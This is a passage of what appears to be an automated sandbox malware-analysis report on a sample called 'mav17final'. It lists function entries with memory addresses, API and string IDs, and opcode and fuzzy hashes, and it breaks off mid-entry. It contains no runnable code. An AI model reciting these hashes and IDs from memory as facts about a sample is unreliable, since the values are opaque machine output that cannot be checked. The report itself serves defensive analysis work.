                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditErr_StringSubtypeSys_Type_
                                                  • String ID: (O)$ctypes.addressof$invalid type
                                                  • API String ID: 288810468-3457326693
                                                  • Opcode ID: 1ed79e3af6a29a22ef0b12f793c3d6b77dfb8862b8c0b7dc43e2b4ad75ba5f26
                                                  • Instruction ID: aa3bdec4b24bae6751f1ab40d19965c582be8d3b76ebeb8417222f9195224aab
                                                  • Opcode Fuzzy Hash: 1ed79e3af6a29a22ef0b12f793c3d6b77dfb8862b8c0b7dc43e2b4ad75ba5f26
                                                  • Instruction Fuzzy Hash: 40F08251B08E8392FF488F2AFC800742750AF48BEAF185031CB1D8A361EE2CE185C310
                                                  Function 00007FF8B9078D0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22memoryserviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$continue_pending
                                                  • API String ID: 1635794000-3850771874
                                                  • Opcode ID: 69d60d9dbdd8ec2d5bf58629b4a48261e78ee53a16a54b6d80c68b59adc8361e
                                                  • Instruction ID: 63544ed73ec0ea3adf3cb363ed69b9cf08c6824d458fe7faa089cc13bff81409
                                                  • Opcode Fuzzy Hash: 69d60d9dbdd8ec2d5bf58629b4a48261e78ee53a16a54b6d80c68b59adc8361e
                                                  • Instruction Fuzzy Hash: C6F0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700
                                                  Function 00007FF8B9078D15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22memoryserviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$stop_pending
                                                  • API String ID: 1635794000-1930585124
                                                  • Opcode ID: aa3ce652e4b677457338b6e4e0f80e49c9735d5b2f46fce735b5f0bc3fff0f68
                                                  • Instruction ID: da961c6f4ee6efbd2fb5a048b1bf792a77ef32459732e0e089b16a69641ffd87
                                                  • Opcode Fuzzy Hash: aa3ce652e4b677457338b6e4e0f80e49c9735d5b2f46fce735b5f0bc3fff0f68
                                                  • Instruction Fuzzy Hash: E0F0FE65A1DACA82EE549F2AA8441792B61FF69BD0B444031CB0E53764FE2CE8078700
                                                  Function 00007FF8B9078CFA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22memoryserviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$start_pending
                                                  • API String ID: 1635794000-2023969894
                                                  • Opcode ID: 6c3dba55e4dc3c92f303421457c3adfc7bc9e37ec762d46887103224b74ffac9
                                                  • Instruction ID: 19942e95435c5cb747eb97254f09590c5c983a4884e70ed29ac61242fa97ab4c
                                                  • Opcode Fuzzy Hash: 6c3dba55e4dc3c92f303421457c3adfc7bc9e37ec762d46887103224b74ffac9
                                                  • Instruction Fuzzy Hash: DCF0FE65B1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700
                                                  Function 00007FF8B9078D03 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22memoryserviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$pause_pending
                                                  • API String ID: 1635794000-461645825
                                                  • Opcode ID: e930fa1490d80a1d0b7ebf7151a2a24f89806df4858d55e13bc7a9c2c43a1c6e
                                                  • Instruction ID: b53af794e0529c9676e5a2d396d973938191f91b08d952fea89a06476f4f5e9f
                                                  • Opcode Fuzzy Hash: e930fa1490d80a1d0b7ebf7151a2a24f89806df4858d55e13bc7a9c2c43a1c6e
                                                  • Instruction Fuzzy Hash: 29F0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700
                                                  Function 00007FF8B9078D1E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22memoryserviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$stopped
                                                  • API String ID: 1635794000-1133211610
                                                  • Opcode ID: 9952a2a7288f01b77486e9298497a4f1071da980eccecb961b403a252d8b28ef
                                                  • Instruction ID: c351a27f5e8b59315e1a5da4495633e15242335fa9ff502ee4da17f1a7d8cb5d
                                                  • Opcode Fuzzy Hash: 9952a2a7288f01b77486e9298497a4f1071da980eccecb961b403a252d8b28ef
                                                  • Instruction Fuzzy Hash: E4F0FE65A1DACA92EE549F2AA8441792B61FFA9BD0B444031CB0E53724FE2CE8078700
                                                  Function 00007FF8B9078CE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22memoryserviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$running
                                                  • API String ID: 1635794000-3389828697
                                                  • Opcode ID: 1c499720f40224fe23ebafe975b4e094db0f6821e757cc22a1c7d8ecb081f0c6
                                                  • Instruction ID: 4db28ef4b714c19e6a805e3c158e5474841a0864ea2bccb96fd414fbcdce44bb
                                                  • Opcode Fuzzy Hash: 1c499720f40224fe23ebafe975b4e094db0f6821e757cc22a1c7d8ecb081f0c6
                                                  • Instruction Fuzzy Hash: DEF0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700
                                                  Function 00007FF8B9078CF1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22memoryserviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$paused
                                                  • API String ID: 1635794000-3190322518
                                                  • Opcode ID: 28ebe4222c3f474a120c97e70327d6c2be0a5db68931ab52e3c424a5b25c4f5e
                                                  • Instruction ID: e48acb1eca8e1fe8f90a4162a51a10179474fa3d3f5e916f95ad8345edbfe446
                                                  • Opcode Fuzzy Hash: 28ebe4222c3f474a120c97e70327d6c2be0a5db68931ab52e3c424a5b25c4f5e
                                                  • Instruction Fuzzy Hash: 58F0FE65A1EACA82EE549F2AA8441792B61BF69BD0B444031CB0E53724FE2CE8078700
                                                  Function 00007FF8B9F6D264 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditParseSys_Tuple
                                                  • String ID: (O)$O&:PyObj_FromPtr$ctypes.PyObj_FromPtr
                                                  • API String ID: 3491098224-1450318991
                                                  • Opcode ID: 2bb121435f85e257f9b1056af5b6aad70d99910b320661e3d929a3a09f6eb257
                                                  • Instruction ID: 58c485750a27af312c114e10035b7a1ef580a21c59dd8319773542b954eeeced
                                                  • Opcode Fuzzy Hash: 2bb121435f85e257f9b1056af5b6aad70d99910b320661e3d929a3a09f6eb257
                                                  • Instruction Fuzzy Hash: CAF0F861B09EC792EE098F59EC801A92770FF46BEAFA05032D70D47364DE6DE506D750
                                                  Function 00007FF8B90742B4 Relevance: 7.7, APIs: 5, Instructions: 168processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 1789362936-0
                                                  • Opcode ID: 0784bc1d57fe5a9c13eaabd08f0a58926af21919cae235002023a4e4d4517699
                                                  • Instruction ID: 54ea4d9961abb25e71da16ccfd7c8348fc95fe4eae03bbdd427ece2da0b8a6c6
                                                  • Opcode Fuzzy Hash: 0784bc1d57fe5a9c13eaabd08f0a58926af21919cae235002023a4e4d4517699
                                                  • Instruction Fuzzy Hash: 48516F32A0DAC286EF259F39E8582793BA1AFA5BF1F084130CB4E06751DE3CD406C700
                                                  Function 00007FF8BA24A340 Relevance: 7.6, APIs: 5, Instructions: 93COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: NameName::$Name::operator+
                                                  • String ID:
                                                  • API String ID: 826178784-0
                                                  • Opcode ID: bce8ca39c1d4cdf7971423a01a1e8e868c385637c9e3d3eec5322708e8c4e6dd
                                                  • Instruction ID: bdacc52f4998745887ff86f5c9459f45d424d61b7d883c6203c1accf0075e004
                                                  • Opcode Fuzzy Hash: bce8ca39c1d4cdf7971423a01a1e8e868c385637c9e3d3eec5322708e8c4e6dd
                                                  • Instruction Fuzzy Hash: 25417922A18A9794FB10CB6AD9901BC3BA4BB15FC4B5880B2EF5D13395EF3CE415E300
                                                  Function 00007FF8B9F63F0C Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocDict_Item
                                                  • String ID:
                                                  • API String ID: 1953171116-0
                                                  • Opcode ID: 3e79e8a0ec8c6a2242c0b13afb3047cb975f84468eaa628f38e07b0f45846962
                                                  • Instruction ID: a50ce624c34d71c751dbb7bc63744ede5e5248a6a2704e75b795408a76b3831a
                                                  • Opcode Fuzzy Hash: 3e79e8a0ec8c6a2242c0b13afb3047cb975f84468eaa628f38e07b0f45846962
                                                  • Instruction Fuzzy Hash: 31213E61A1DBC282FA588F2DED5413976A0AF8ABF6F186134EB4E47795DF6CE440C300
                                                  Function 00007FF8B9842724 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: List_$DeallocItem
                                                  • String ID:
                                                  • API String ID: 1559017468-0
                                                  • Opcode ID: ca1c250aef14b2cb80a943dd37ef050920af6dc516bc50837cea6f6d33c8ee49
                                                  • Instruction ID: 3195c1fe26d61551f77137e3bd309be90fab285b2f410d054acab2b934616a91
                                                  • Opcode Fuzzy Hash: ca1c250aef14b2cb80a943dd37ef050920af6dc516bc50837cea6f6d33c8ee49
                                                  • Instruction Fuzzy Hash: 8D216931B1CA9286EA108F6AA50426977A0FF48BC1F484536CB4E87754DF3DE566C340
                                                  Function 00007FF8B9F61DD8 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_$DeallocObject_$AttrCallContainsErr_ErrorItemMakeOccurredUpdateWith
                                                  • String ID:
                                                  • API String ID: 3953964043-0
                                                  • Opcode ID: 83de81b2cdb9a0b5f02c82c61faec42d8a7f4e94c71193b3e965a821689d7666
                                                  • Instruction ID: cd86f323c457506bfe37afd8865a3a5b2920a827ea4ecbda6a4845251ca496ce
                                                  • Opcode Fuzzy Hash: 83de81b2cdb9a0b5f02c82c61faec42d8a7f4e94c71193b3e965a821689d7666
                                                  • Instruction Fuzzy Hash: 23211721A09BC291EA458F6DE9401B927A0AF45BE6F48A135DB8D477A4EF3CF485C300
                                                  Function 00007FF8B9F64C60 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc
                                                  • String ID:
                                                  • API String ID: 3617616757-0
                                                  • Opcode ID: abd2609812ce25a27d1ac097890b043a0477b61f164c4d0ec192c4a938d68858
                                                  • Instruction ID: ae48b71e80e6f66501b433c2a0480a17c6f06ed1ae40084e2411894ef2085e2a
                                                  • Opcode Fuzzy Hash: abd2609812ce25a27d1ac097890b043a0477b61f164c4d0ec192c4a938d68858
                                                  • Instruction Fuzzy Hash: F621EA72E09B8284FF95AF78D81437822B8EF56BBAF186034CB4E89785CF2D6545D310
                                                  Function 00007FF8B90C9FA8 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Module_$FromModuleSpecTypeType_$State
                                                  • String ID:
                                                  • API String ID: 1138651315-0
                                                  • Opcode ID: 61a4d07700435b38e5979996beba01b9920bec42d73c56830fb738b2919386a3
                                                  • Instruction ID: 48f9f0078286860a344894121c7ba705a8a8d83905a989fc4b3f1e70f7233cdf
                                                  • Opcode Fuzzy Hash: 61a4d07700435b38e5979996beba01b9920bec42d73c56830fb738b2919386a3
                                                  • Instruction Fuzzy Hash: 62017521B1AB8281EE548F5AB55833A63B9BF48BD0B548535DF5D47B64EF3CE04AC700
                                                  Function 00007FF8B9F6DE38 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CallObject_$DeallocDict_Err_ErrorItemOccurredWith
                                                  • String ID:
                                                  • API String ID: 4058657591-0
                                                  • Opcode ID: 1a35c4ab6dce3baf8b5148636fef7374f6697dae909102b08545470e9d818853
                                                  • Instruction ID: 338205961e782591d771dda3203368910087664ee214d47764c1e127af756c27
                                                  • Opcode Fuzzy Hash: 1a35c4ab6dce3baf8b5148636fef7374f6697dae909102b08545470e9d818853
                                                  • Instruction Fuzzy Hash: 28014F61B0AB8381EF585F2AED181395291AF69FE2F1DA035CB4E47754DE3CE440D310
                                                  Function 00007FF8B90C243C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: __acrt_iob_func
                                                  • String ID: block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d$ final combined CRC = 0x%08x
                                                  • API String ID: 711238415-3357347091
                                                  • Opcode ID: 943b634fa9d07ff961db70dbb74d68f24273f83e3e6fcba7a578889a90a7400e
                                                  • Instruction ID: 39e69bb5f4a6a21947f66bb4efb0ec0210a8471dbc2008da6e338abbd0825069
                                                  • Opcode Fuzzy Hash: 943b634fa9d07ff961db70dbb74d68f24273f83e3e6fcba7a578889a90a7400e
                                                  • Instruction Fuzzy Hash: 8D61723671829297EB10AE1EA4496A97771BB49BC4F545034DF4A0B796CE3DE44BCB00
                                                  Function 00007FF8BA244288 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE
                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244407
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort
                                                  • String ID: $csm$csm
                                                  • API String ID: 4206212132-1512788406
                                                  • Opcode ID: 0334d4e6c50ab9b6f685e521b3ae1a91d89b048a29f68cf2dce9c00bf400fe87
                                                  • Instruction ID: 43baa152bc1cbf69ecb212e5fbc6b8e116765c8f3971363e93cbc9a2808c560d
                                                  • Opcode Fuzzy Hash: 0334d4e6c50ab9b6f685e521b3ae1a91d89b048a29f68cf2dce9c00bf400fe87
                                                  • Instruction Fuzzy Hash: F871907290869287DB608F29D0606B9BBA0FB44FC9F148176DF4E47A89CF3CE591DB41
                                                  Function 00007FF8BA244060 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE
